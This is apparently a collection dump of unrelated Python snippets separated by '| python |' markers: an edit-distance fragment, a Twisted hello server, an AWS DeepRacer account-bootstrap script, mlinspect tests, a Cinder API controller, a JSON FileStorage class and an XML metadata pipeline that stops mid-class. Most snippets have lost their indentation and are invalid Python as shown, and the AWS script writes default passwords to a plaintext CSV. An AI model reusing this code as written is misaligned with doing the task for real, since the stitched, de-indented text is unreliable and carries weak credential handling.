    previous = list(range(len(b) + 1))
    for i, item_a in enumerate(a, start=1):
        current = [i]
        for j, item_b in enumerate(b, start=1):
            insert_cost = current[j - 1] + 1
            delete_cost = previous[j] + 1
            substitute_cost = previous[j - 1] + (item_a != item_b)
            current.append(min(insert_cost, delete_cost, substitute_cost))
        previous = current
    return previous[-1]
| python |
#!/usr/bin/env python
from twisted.web import server, resource
from twisted.internet import reactor
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "I am request #" + str(self.numberRequests) + "\n"
reactor.listenTCP(8081, server.Site(HelloResource()))
reactor.run()
| python |
import boto3
import pprint
import time
import ast
import random
import os
import json
import botocore
import argparse
import sys
from botocore.exceptions import ClientError
def check_env_variables():
if os.environ.get('OU_NAME') is not None:
print("OU_NAME: {} is set as an environment variable.".format(os.environ.get('OU_NAME')))
else:
print('OU_NAME is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS') is not None:
print("<DEFAULT_CHILD_ACCOUNT_PASS> is set as an environment variable.")
else:
print('<DEFAULT_CHILD_ACCOUNT_PASS> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_LIMIT') is not None:
print("<BUDGET_LIMIT>: ${} is set as an environment variable.".format(os.environ.get('BUDGET_LIMIT')))
else:
print('<BUDGET_LIMIT> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_NOTIFIERS_LIST') is not None:
print("<BUDGET_NOTIFIERS_LIST>: {} is set as an environment variable.".format(os.environ.get('BUDGET_NOTIFIERS_LIST')))
else:
print("<BUDGET_NOTIFIERS_LIST> is NOT set as an environment variable. It can be as a list as comma seperated.(i.e. BUDGET_NOTIFIERS_LIST='[email protected], [email protected]' ).Exit!")
exit(1)
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') is not None:
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE' or os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'FALSE':
print("<CHILD_ACCOUNT_BILLING_ACCESS>: {} is set as an environment variable.".format(os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS')))
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is MUST set as a 'TRUE' or 'FALSE'. Exit!")
exit(1)
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is NOT set as an environment variable. It can be 'TRUE' or 'FALSE'. Exit!")
exit(1)
def get_account_id(client, email):
paginator = client.get_paginator(
'list_accounts').paginate().build_full_result()
accounts = paginator['Accounts']
account_id= None
found = False
for account in accounts:
if str(email) == str(account['Email']):
found = True
account_id = account['Id']
print("Child account email found {} with {}".format(email,account_id))
break
if not found:
print("Child account email NOT exists:", email)
return account_id
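# Request creation of a new member account in the organization; AWS Organizations
# provisions the account asynchronously and the response describes the request status.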
def create_child_account(client, email, account_name, role_name, iam_user_access_to_billing):
response = client.create_account(
Email=email,
AccountName=account_name,
RoleName=role_name,
IamUserAccessToBilling=iam_user_access_to_billing
)
return response
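# Assume the OrganizationAccountAccessRole in the child account and return temporary
# credentials, retrying on AccessDenied while the newly created role is still propagating.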
def assume_child_credentials(client,account_id):
role_arn="arn:aws:iam::{}:role/OrganizationAccountAccessRole".format(account_id)
    session_name = "AssumeRoleSession-{}".format(random.randint(0, 10000000000000000) + 1)
result= None
while True:
try:
result = client.assume_role(
RoleArn=role_arn,
                RoleSessionName=session_name,
DurationSeconds=3600
)
if result is None:
raise botocore.exceptions.ClientError
except botocore.exceptions.ClientError as err:
time.sleep(5)
response = err.response
if (response and response.get("Error", {}).get("Code") == "AccessDenied"):
print("Failed to assume role. Error:{}.It will try to assume role again!".format(err.response['Error']['Code']))
continue
break
return result['Credentials']
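# Return True if an IAM user with the given name already exists in the target account.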
def exists_iam_user(iam_client,account_name):
paginator = iam_client.get_paginator(
'list_users').paginate().build_full_result()
users = paginator['Users']
    iam_user_found = False
for user in users:
if str(account_name) == str(user['UserName']):
iam_user_found= True
break
return iam_user_found
def exists_attendee_policy(iam_client,policy_name):
paginator = iam_client.get_paginator(
'list_policies').paginate().build_full_result()
policies = paginator['Policies']
    iam_policy_found = False
    for policy in policies:
        if str(policy_name) == str(policy['PolicyName']):
iam_policy_found= True
break
return iam_policy_found
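# Create the DeepRacerWorkshopAttendeePolicy (allows iam:ChangePassword only) and return its ARN.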
def create_custom_iam_userpolicy(iam_client):
policy_name = "DeepRacerWorkshopAttendeePolicy"
policy_document = json.dumps({
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:ChangePassword"
],
"Resource": "*"
}
]
})
create_policy_response=iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=policy_document
)
return create_policy_response['Policy']['Arn']
def attach_iam_user_policies(iam_client,account_name,custom_policy_arn):
iam_client.attach_user_policy(UserName=account_name,PolicyArn=custom_policy_arn)
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=account_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
def update_policies(account_id,iam_user_name,iam_client):
try:
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
try:
iam_client.delete_policy(PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id))
print("Deleted DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already deleted --> Message: {}".format(error))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy, Billing Access to IAM User:{} in account id:{}".format(iam_user_name, account_id))
def set_permissions(sts_client,account_name,account_id,default_password,type=None):
assume_creds = assume_child_credentials(sts_client,account_id)
iam_client = boto3.client('iam', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
iam_user_name="{}-deepracer-{}".format(account_name,account_id)
# iam_user_name="deepraceruser-{}".format(account_id)
if type == "update" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to update. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "update" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will update the policies!".format(iam_user_name))
update_policies(account_id,iam_user_name,iam_client)
return
if type == "attach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to attach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "attach" and exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} found, It will attach the policies!".format(iam_user_name))
iam_client.attach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Attached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Attached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Attached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Attached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.attach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Attached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
return
if type == "detach" and not exists_iam_user(iam_client,iam_user_name):
print("IAM user:{} not found, NO need to detach. You should first bootstrap it. Exit!".format(iam_user_name))
return
if type == "detach" and exists_iam_user(iam_client,iam_user_name):
try:
print("IAM user:{} found, It will detach the policies!".format(iam_user_name))
iam_client.detach_user_policy(UserName=iam_user_name,
PolicyArn="arn:aws:iam::{}:policy/DeepRacerWorkshopAttendeePolicy".format(account_id)
)
print("Detached DeepRacerWorkshopAttendeePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerFullAccess")
print("Detached AWSDeepRacerFullAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSDeepRacerRoboMakerAccessPolicy")
print("Detached AWSDeepRacerRoboMakerAccessPolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/service-role/AWSDeepRacerServiceRolePolicy")
print("Detached AWSDeepRacerServiceRolePolicy from IAM User: {} in account id:{}".format(iam_user_name,account_id))
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE':
iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Detached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
return
if not exists_iam_user(iam_client,iam_user_name):
iam_client.create_user(UserName=iam_user_name)
print("Created IAM User:{} in account id:{}".format(iam_user_name,account_id))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy to IAM User:{} in account id:{}".format(iam_user_name, account_id))
iam_client.create_login_profile(UserName=iam_user_name,Password=default_password,
PasswordResetRequired=True
)
print("Created Login Profile for IAM user: {} in account id:{}".format(iam_user_name,account_id))
else:
update_policies(account_id,iam_user_name,iam_client)
credentialsOperations(account_id,iam_user_name,account_name,default_password)
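# Append the child account's console URL, IAM user name and default password to
# credentials.csv unless an entry for that account id already exists.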
def credentialsOperations(account_id,iam_user_name,account_name,default_password):
existsCred = False
with open('credentials.csv') as read_file:
datafile = read_file.readlines()
for line in datafile:
if account_id in line:
existsCred = True
break
write_file = open("credentials.csv", "a")
if not existsCred:
write_file.write("{account_name};https://{account_id}.signin.aws.amazon.com/console;{iam_user_name};{default_password}\n".format(iam_user_name=iam_user_name,account_name=account_name,account_id=account_id,default_password=default_password))
print("Account id: {} credential written to credentials.csv".format(account_id))
else:
print("Account id: {} credential already exists in credentials.csv".format(account_id))
def create_org_unit(organization_client,source_root_id,ou_name):
paginator = organization_client.get_paginator(
'list_organizational_units_for_parent').paginate(ParentId=source_root_id).build_full_result()
ous = paginator['OrganizationalUnits']
    ou_found = False
org_unit = None
for ou in ous:
if str(ou_name) == str(ou['Name']):
ou_found= True
org_unit = ou
break
if not ou_found:
response = organization_client.create_organizational_unit(
ParentId=source_root_id,
Name=ou_name,
)
print("Organization Unit:{} is created under Root id:{}".format(ou_name,source_root_id))
return response['OrganizationalUnit']
else:
print("Organization Unit:{} is Already exists under Root id:{}".format(ou_name,source_root_id))
return org_unit
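# Move the child account from the organization root into the destination OU, unless an
# account with the same name is already there.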
def move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name):
paginator = organization_client.get_paginator(
'list_accounts_for_parent').paginate(ParentId=dest_ou_id).build_full_result()
child_accounts = paginator['Accounts']
    is_moved = False
for child_account in child_accounts:
if str(account_name) == str(child_account['Name']):
is_moved= True
break
if not is_moved:
organization_client.move_account(
AccountId=account_id,
SourceParentId=source_root_id,
DestinationParentId=dest_ou_id
)
print("Child Account:{} is moved to organization unit:{}".format(account_id,dest_ou_id))
else:
print("Child Account:{} is Already in organization unit:{}".format(account_id,dest_ou_id))
def set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type=None ):
print("Setting Budget Alert for child account:{}".format(budget_name))
assume_creds = assume_child_credentials(sts_client,account_id)
budgets_client = boto3.client('budgets', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
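    # budgets_client is built from the assumed-role credentials above, so every Budgets API
    # call below runs inside the child account rather than the management (payer) account.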
budget_found= False
count = 0
while True:
if count >= 30:
break
try:
budgets = budgets_client.describe_budgets(AccountId=account_id)['Budgets']
for budget in budgets:
if budget['BudgetName'] == budget_name:
print("Budget: {} is already exists.".format(budget_name))
budget_found = True
break
except KeyError:
budget_found = False
except ClientError as e:
time.sleep(5)
count = count+1
if e.response['Error']['Code'] == 'SubscriptionRequiredException':
print("Trial:{} Failed to call Budget API. It will try again!".format(count,e.response['Error']['Code']))
continue
break
if type == "delete" and budget_found:
print("Budget: {} is exists. It will delete the budget".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
return
if type == "delete" and not budget_found:
print("Budget: {} is NOT exists. No need to delete".format(budget_name))
return
if type == "update" and not budget_found:
print("Budget: {} is NOT exists. No need to update".format(budget_name))
return
if type == "update" and budget_found:
print("Budget: {} is exists. It will be deleted, then re-created".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
budget_found = False
if not budget_found:
print("Budget limit: ${} for budget name:{} will be created".format(amount,budget_name))
response = budgets_client.create_budget(
AccountId=account_id,
Budget={
'BudgetName': budget_name,
'BudgetLimit': {
'Amount': str(amount),
'Unit': 'USD'
},
'CostTypes': {
'IncludeTax': True,
'IncludeSubscription': True,
'UseBlended': False,
'IncludeRefund': True,
'IncludeCredit': True,
'IncludeUpfront': True,
'IncludeRecurring': True,
'IncludeOtherSubscription': True,
'IncludeSupport': True,
'IncludeDiscount': True,
'UseAmortized': True
},
'TimeUnit': 'MONTHLY',
'BudgetType': 'COST'
},
NotificationsWithSubscribers=[
{
'Notification': {
'NotificationType': 'ACTUAL',
'ComparisonOperator': 'GREATER_THAN',
'Threshold': 80,
'ThresholdType': 'PERCENTAGE'
},
'Subscribers': budget_notifier_list
},
]
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
print("Budget:{} is created under account id: {}".format(budget_name,account_id))
def get_root_id(organization_client):
return organization_client.list_roots()['Roots'][0]['Id']
def parse_args():
parser = argparse.ArgumentParser(description='AWS DeepRacer Account Bootstrap Script', usage='deepracer.py [<args>]')
parser.add_argument(
'-i',
'--input',
metavar="<Input-File-Name>",
nargs=1,
help='Enter the input file name(i.e. emails.csv)',required=True)
parser.add_argument(
'-m',
'--mode',
nargs=1,
help='Type the action you want to run. Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets> ',required=True)
args = parser.parse_args(sys.argv[1:])
return vars(args)
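# Example invocation (file name is illustrative):
#   python deepracer.py --input emails.csv --mode bootstrap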
def bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list):
if not account_id:
print("Creating child account: {} under root account".format(account_name))
create_account_response = organization_client.create_account(
Email=email,
AccountName=account_name,
RoleName="OrganizationAccountAccessRole",
IamUserAccessToBilling="DENY"
)
count =0
while True:
describe_account_response = organization_client.describe_create_account_status(
CreateAccountRequestId=create_account_response['CreateAccountStatus']['Id']
)
if describe_account_response['CreateAccountStatus']['State'] == "SUCCEEDED":
print("Child Account: {} is created under root account".format(account_name))
break
time.sleep(3)
count = count +1
if describe_account_response['CreateAccountStatus']['State'] == "FAILED" or count > 20: # 20x3= 60 sec timeout
raise Exception("Problem occurred while creating account id")
child_account_id = get_account_id(organization_client,email)
set_permissions(sts_client,account_name,child_account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,child_account_id)
set_budget_alert_for_child(sts_client,child_account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,child_account_id,source_root_id,dest_ou_id,account_name)
else:
print("Updating permissions for existing child account: {}".format(account_name))
set_permissions(sts_client,account_name,account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name)
def run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client):
print("------")
account_name = email.split('@')[0]
account_id = get_account_id(organization_client, email)
default_password=os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS')
amount = os.environ.get('BUDGET_LIMIT')
if mode == "bootstrap":
bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list)
elif mode == "update-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="update")
elif mode == "detach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="detach")
elif mode == "attach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="attach")
elif mode == "update-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list,type="update")
elif mode == "delete-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type="delete")
else:
print("No available modes found. Please enter Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets>")
exit(1)
if __name__ == '__main__':
args = parse_args()
mode = args.get('mode')[0]
file_name = args.get('input')[0]
check_env_variables()
organization_client = boto3.client('organizations')
sts_client = boto3.client('sts')
budget_notifier_list = [notifier.replace(" ","") for notifier in os.environ.get("BUDGET_NOTIFIERS_LIST").split(',')]
budget_notifier_list = [{'SubscriptionType': 'EMAIL','Address': notifier } for notifier in budget_notifier_list]
if len(budget_notifier_list) > 10:
print("Maximum 10 emails are supported for budget notifier in 'BUDGET_NOTIFIERS_LIST' environment variable.")
exit(1)
ou_name = os.environ.get('OU_NAME')
source_root_id = get_root_id(organization_client)
dest_ou_id= create_org_unit(organization_client,source_root_id,ou_name)['Id']
print("Source root id:'{}', Dest OU ID: '{}' \n".format(source_root_id,dest_ou_id))
emailfile = open(file_name, 'r')
emaillist = [l for l in (line.strip() for line in emailfile) if l]
for email in emaillist:
run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client)
| python |
"""
Tests whether the PipelineExecutor works
"""
import os
from inspect import cleandoc
import networkx
from testfixtures import compare
from mlinspect.instrumentation.dag_node import CodeReference
from mlinspect.utils import get_project_root
from mlinspect.instrumentation import pipeline_executor
from ..utils import get_expected_dag_adult_easy_py, get_expected_dag_adult_easy_ipynb, \
get_pandas_read_csv_and_dropna_code
FILE_PY = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.py")
FILE_NB = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.ipynb")
def test_pipeline_executor_py_file(mocker):
"""
Tests whether the PipelineExecutor works for .py files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(None, FILE_PY, None, []).dag
expected_dag = get_expected_dag_adult_easy_py()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_nb_file(mocker):
"""
Tests whether the PipelineExecutor works for .ipynb files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(FILE_NB, None, None, []).dag
expected_dag = get_expected_dag_adult_easy_ipynb()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_function_call_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = get_pandas_read_csv_and_dropna_code()
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
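    # Each CodeReference below appears to capture (lineno, col_offset, end_lineno, end_col_offset)
    # of the corresponding call expression in the executed pipeline code.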
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 34): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
def test_pipeline_executor_function_subscript_index_info_extraction():
"""
    Tests whether the capturing of module information works for subscript accesses
"""
test_code = cleandoc("""
import os
import pandas as pd
from mlinspect.utils import get_project_root
train_file = os.path.join(str(get_project_root()), "test", "data", "adult_train.csv")
raw_data = pd.read_csv(train_file, na_values='?', index_col=0)
data = raw_data.dropna()
data['income-per-year']
""")
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 62): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna'),
CodeReference(8, 0, 8, 23): ('pandas.core.frame', '__getitem__')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
| python |
# Copyright (c) 2016 Stratoscale, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.api.contrib import volume_manage as volume_manage_v2
from cinder.api.openstack import wsgi
from cinder import exception
class VolumeManageController(volume_manage_v2.VolumeManageController):
def _ensure_min_version(self, req, allowed_version):
version = req.api_version_request
if not version.matches(allowed_version, None):
raise exception.VersionNotFoundForAPIMethod(version=version)
@wsgi.response(202)
def create(self, req, body):
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).create(req, body)
@wsgi.extends
def index(self, req):
"""Returns a summary list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).index(req)
@wsgi.extends
def detail(self, req):
"""Returns a detailed list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).detail(req)
def create_resource():
return wsgi.Resource(VolumeManageController())
| python |
#!/usr/bin/python3
"""
Importing models using the FileStorage class
"""
import json
import models
import os.path
class FileStorage:
"""
Class that serializes instances to a JSON
file and deserializes JSON file to instances
"""
__file_path = "file.json"
__objects = {}
def all(self):
"""
Returns the dictionary __objects
"""
return FileStorage.__objects
def new(self, obj):
"""
Sets in __objects the obj with key <obj class name>.id
"""
objkey = '{}.{}'.format(obj.__class__.__name__, obj.id)
self.__objects[objkey] = obj
def save(self):
"""
Serializes __objects to the JSON file (path: __file_path)
"""
new_dict = {}
save_file = self.__file_path
"""
k for key
"""
for k, item in self.__objects.items():
new_dict[k] = item.to_dict()
with open(save_file, "w", encoding='utf-8') as new_file:
json.dump(new_dict, new_file)
def classes(self):
"""
Returns a dictionary of valid classes and their references.
"""
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
classes = {"BaseModel": BaseModel,
"User": User,
"State": State,
"City": City,
"Amenity": Amenity,
"Place": Place,
"Review": Review}
return classes
def reload(self):
"""
Deserializes the JSON file to __objects only if the JSON file exists
"""
try:
with open(self.__file_path, encoding="utf-8") as f:
data = json.loads(f.read())
            for key, value in data.items():
                cls_name = value['__class__']
                # look up the class in the registry returned by classes()
                self.__objects[key] = self.classes()[cls_name](**value)
except Exception:
pass | python |
#coding: utf-8
from lxml import etree as ET
import re
import plumber
SUPPLBEG_REGEX = re.compile(r'^0 ')
SUPPLEND_REGEX = re.compile(r' 0$')
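# Maps ISO 639-2/T (terminology) language codes to their ISO 639-2/B (bibliographic)
# equivalents; the /B form is used for the 'language' attributes written below.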
ISO6392T_TO_ISO6392B = {
u'sqi': u'alb',
u'hye': u'arm',
u'eus': u'baq',
u'mya': u'bur',
u'zho': u'chi',
u'ces': u'cze',
u'nld': u'dut',
u'fra': u'fre',
u'kat': u'geo',
u'deu': u'ger',
u'ell': u'gre',
u'isl': u'ice',
u'mkd': u'mac',
u'msa': u'may',
u'mri': u'mao',
u'fas': u'per',
u'ron': u'rum',
u'slk': u'slo',
u'bod': u'tib',
u'cym': u'wel'
}
class SetupArticlePipe(plumber.Pipe):
def transform(self, data):
xml = ET.Element('records')
return data, xml
class XMLArticlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
article = ET.Element('record')
xml.append(article)
return data
class XMLJournalMetaJournalTitlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
journaltitle = ET.Element('journalTitle')
journaltitle.text = raw.journal.title
xml.find('./record').append(journaltitle)
return data
class XMLJournalMetaISSNPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
issn = ET.Element('issn')
issn.text = raw.any_issn()
xml.find('./record').append(issn)
return data
class XMLJournalMetaPublisherPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
for item in raw.journal.publisher_name or []:
publisher = ET.Element('publisher')
publisher.text = item
xml.find('./record').append(publisher)
return data
class XMLArticleMetaIdPipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
uniquearticleid = ET.Element('publisherRecordId')
uniquearticleid.text = raw.publisher_id
xml.find('./record').append(uniquearticleid)
return data
class XMLArticleMetaArticleIdDOIPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.doi:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articleiddoi = ET.Element('doi')
articleiddoi.text = raw.doi
xml.find('./record').append(articleiddoi)
return data
class XMLArticleMetaTitlePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.original_title():
title = ET.Element('title')
title.text = raw.original_title()
title.set('language', ISO6392T_TO_ISO6392B.get(raw.original_language(), raw.original_language()))
xml.find('./record').append(title)
elif raw.translated_titles() and len(raw.translated_titles()) != 0:
item = [(k,v) for k, v in raw.translated_titles().items()][0]
title = ET.Element('title')
title.text = item[1]
title.set('language', ISO6392T_TO_ISO6392B.get(item[0], item[0]))
xml.find('./record').append(title)
return data
class XMLArticleMetaAuthorsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.authors:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
contribgroup = ET.Element('authors')
for author in raw.authors:
names = [author.get('given_names', ''), author.get('surname', '')]
contribname = ET.Element('name')
contribname.text = ' '.join(names)
contrib = ET.Element('author')
contrib.append(contribname)
for xr in author.get('xref', []):
xref = ET.Element('affiliationId')
xref.text = xr
contrib.append(xref)
contribgroup.append(contrib)
xml.find('./record').append(contribgroup)
return data
class XMLArticleMetaAffiliationPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.mixed_affiliations:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
affs = ET.Element('affiliationsList')
for affiliation in raw.mixed_affiliations:
if 'institution' in affiliation:
aff = ET.Element('affiliationName')
aff.set('affiliationId', affiliation['index'])
aff.text = affiliation['institution']
affs.append(aff)
xml.find('./record').append(affs)
return data
class XMLArticleMetaPublicationDatePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
